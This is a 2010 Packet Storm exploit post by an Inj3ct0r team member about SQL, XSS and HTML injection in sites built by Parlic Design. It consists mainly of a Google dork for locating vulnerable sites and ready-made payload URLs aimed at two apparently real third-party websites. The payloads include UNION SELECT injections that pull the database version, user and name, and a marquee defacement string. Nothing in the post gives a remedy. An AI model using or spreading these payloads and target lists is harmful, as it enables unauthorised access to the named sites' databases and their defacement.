Parlic Design Cross Site Scripting / SQL Injection

2010-05-28T00:00:00
ID PACKETSTORM:90044
Type packetstorm
Reporter XroGuE
Modified 2010-05-28T00:00:00

Description

                                        
                                            `  
  
  
=======================================================================  
# parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities  
=======================================================================  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 #################################### 1  
0 I'm XroGuE member from Inj3ct0r Team 1  
1 #################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
########################################################################  
# Name: parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities  
# Vendor: http://www.parlic.com  
# Date: 2010-05-27  
# Author: XroGuE  
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !  
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com  
# Home: (-_+)  
########################################################################  
  
[+] Dork: intext:"Parlic Design" inurl:id  
intext:"design and developed by Parlic Design"  
  
  
[+] Vulnerabilities:  
  
http://[target]/[path]/*.php?id=[SQL/XSS/HTML]  
  
  
[+] XSS InjecTion Vulnerability:  
  
[+] Demo: http://www.spc-linz.org/ser/parohija.php?id=  
http://www.cadebou-royalmer.com/strane/pas.php?id=  
  
########################################################################  
  
[+] HTML InjecTion Vulnerability:  
  
[+] Demo: http://www.spc-linz.org/ser/parohija.php?id=<marquee><font color=red size=15>XroGuE</font></marquee>  
http://www.cadebou-royalmer.com/strane/pas.php?id=<marquee><font color=red size=15>XroGuE</font></marquee>  
  
########################################################################  
  
[+] SQL InjecTion Vulnerability:  
  
[+] Demo: http://www.spc-linz.org/ser/parohija.php?id=-999+union+all select+1,2,3,4,5,version(),user()--  
http://www.cadebou-royalmer.com/strane/pas.php?id=-999+UNION+SELECT+1,2,version(),user(),5,database(),7,8,9,10,11,12,13,14,15,16  
  
########################################################################  
  
_________________________________________________________________  
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`